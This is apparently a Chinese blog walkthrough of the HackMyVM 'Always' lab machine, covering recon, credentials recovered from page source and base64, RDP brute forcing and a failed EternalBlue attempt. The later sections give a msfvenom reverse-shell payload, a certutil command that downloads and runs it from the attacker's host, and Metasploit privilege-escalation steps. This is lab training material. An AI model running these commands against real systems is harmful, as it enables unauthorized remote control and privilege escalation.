7.1 信息打点
nmap -sS -p- -T4 10.10.10.161 -A
![图片[1]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018170916615.png?imageSlim)
使用目录扫描出来一个admin后台界面
![图片[2]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171232502.png?imageSlim)
查看源码发现账号密码信息
![图片[3]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171451517.png?imageSlim)
登录进来发现一个base编码
![图片[4]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171508440.png?imageSlim)
解密
ftpuser:KeepGoingBro!!!
![图片[5]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171542324.png?imageSlim)
7.2 登录FTP
使用刚刚的账号密码登录
ftp 10.10.10.161
![图片[6]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171647625.png?imageSlim)
发现了一个robots.txt,使用下面的命令将它下载下来
get robots.txt
![图片[7]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171748228.png?imageSlim)
查看这个robots.txt中的文件
![图片[8]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171821333.png?imageSlim)
管理员的秘密笔记
1)禁用防火墙和 Windows Defender。
2)启用 FTP 和 SSH。
3)启动 Apache 服务器。
4)别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。
又得到一个密码
always:YouCantFindMe.!.!
![图片[9]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018171920633.png?imageSlim)
7.3 远程登录
![图片[10]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018172748007.png?imageSlim)
发现密码不对,我们来使用hydra来爆破rdp协议
![图片[11]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018172736185.png?imageSlim)
使用enum4linux枚举,看到支持的smb协议,为1.0和2.0/2.1,3.0以上均不支持,让我联想到了永痕之蓝漏洞(MS17-010)
enum4linux-ng -A 10.10.10.161 -C
![图片[12]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018194244803.png?imageSlim)
含义:-A 是 --all 的缩写,表示执行全量信息收集,包含以下枚举内容:
- 主机基础信息(主机名、工作组 / 域、MAC 地址);
- SMB 协议支持情况(支持的 SMB 版本、签名配置);
- 用户和组列表(本地用户、域用户、内置组等);
- 共享目录(可访问的 SMB 共享及权限);
- 操作系统版本(通过 RPC 或 SMB 信息推断);
- 服务、打印机、系统策略等其他信息。
7.4 永痕之蓝
利用,很遗憾利用失败
![图片[13]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018200847073.png?imageSlim)
利用nxc枚举这两个账号密码
always:YouCantFindMe.!.!
ftpuser:KeepGoingBro!!!
![图片[14]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018201723032.png?imageSlim)
看到ftpuser用户,尝试登录,也不让远程登录
![图片[15]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018210432820.png?imageSlim)
7.5 近源攻击
这里没找到其他方法,直接登录靶机上传shell吧(近源攻击),这里还需要注意,就是需要修改一下语言为美国的,不然登录不进去
![图片[16]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018202231034.png?imageSlim)
7.6 Msf获取反向shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe
certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exe
![图片[17]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018211736035.png?imageSlim)
msf上线
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.137
set lport 4444
run
![图片[18]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018212039872.png?imageSlim)
7.6 MSF内核漏扫
use multi/recon/local_exploit_suggester
![图片[19]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018214908658.png?imageSlim)
使用第一个模块,设置第一个会话,并进行提权
![图片[20]-HackMyVm-Always :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251018214848052.png?imageSlim)
##
往期推荐
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
新版BurpSuite v2025.6.3汉化版,附激活教程
重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器
FeatherScan v4.0 – 一款Linux内网全自动信息收集工具
近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等
内网渗透必备,microsocks,一个轻量级的socks代理工具
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
内网渗透必备,microsocks,一个轻量级的socks代理工具
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!














暂无评论内容